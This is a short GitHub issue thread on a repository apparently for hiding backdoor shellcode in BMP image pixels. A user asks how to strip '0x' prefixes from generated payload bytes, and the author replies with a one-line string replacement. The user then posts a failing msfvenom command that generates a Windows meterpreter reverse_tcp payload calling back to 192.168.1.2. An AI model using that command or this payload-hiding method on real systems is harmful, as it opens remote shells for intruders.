DamonMohammadbagher / NativePayload_Image

Transferring Backdoor Payloads with BMP Image Pixels
79 stars 37 forks source link

removing 0x #2

Open horllste opened 7 years ago

horllste commented 7 years ago

Hello, thanks for sharing this great knowledge, i want to ask if there is a way to automate the removal of 0x in the generated payload like below

0xfc , 0x48 , 0x83 “ to fc,48,83

thanks

DamonMohammadbagher commented 7 years ago

in your code you should do something like this string s = "0xfc,0x48,0x83“.Replace("0x", ""); now your s == " fc,48,83"

horllste commented 7 years ago

root@sect:~# msfvenom --platfoem windows --arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 -f c > payload.txt Error: Invalid option MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options]

horllste commented 7 years ago

okay, got the payload generation, i will try it and post back here.

Hancock888 commented 5 years ago

This help me fix error 0x48 see video :)